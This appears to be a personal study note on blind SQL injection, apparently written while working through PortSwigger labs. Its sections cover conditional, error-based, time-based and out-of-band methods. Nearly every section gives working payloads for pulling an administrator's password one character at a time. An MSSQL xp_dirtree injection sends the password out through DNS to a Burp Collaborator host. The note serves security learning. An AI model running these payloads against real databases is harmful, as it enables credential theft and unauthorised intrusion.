Result of the query is invisible (common now).

Union attacks are weak against this.


# Conditional Statements
Example: delivery tracking which uses a cookie. The cookie can be modified to inject `' AND 1=2`
The response can now be checked for differences.

## Finding passwords

`xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm'-- ` - Checks if the first letter > m. This set of queries can be used to get password letter by letter, maybe we can try with `=` too.
*Note:* Check the [Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet) for specific syntax. Logic is the same. Use Intruder for permutations of position and character.


# Error-Based
Sometimes, conditions don't make any change in output. So induce an error in the query.

In the same example as above,
`xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a` should throw an error of 1/0.
Simpler checking payload: `xyz' and 1/0=2`

See if there's any change in output. Now, if there is, replace the 1=1 with a condition of our own like:
`xyz' AND (SELECT CASE WHEN (SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm') THEN 1/0 ELSE 'a' END)='a` 


*Weird Oracle syntax*: `'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'`


# Verbose Errors
Returns the entire error message, gives info about the command executed on the server


# Time Based
Errors can be handled by the DB and all methods till now might not work
`'; IF (CONDITION) WAITFOR DELAY '0:0:10'--`
Syntaxes are different so check the [Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet).

Data can be retrieved again one character at a time.
`'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--`

# Out-of-band Techniques
The server may run the queries asynchronously, where all other methods fail. Response might not depend on time, error, etc. DNS queries can be used with conditions to send requests to our device, and this should be possible since DNS is usually given a ton of permissions ( it is essential for any server ).

Burp Collaborator can be used to monitor requests coming in ( it has custom implementation of DNS ) The injection `'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--` on Microsoft SQL looks up the specified domain.
That fucker needs Burp Premium though ugh

Injections like `'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--` let you send data from the query to the specified collaborator URL. 

The lookup `S3cure.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net` lets you see the captured data.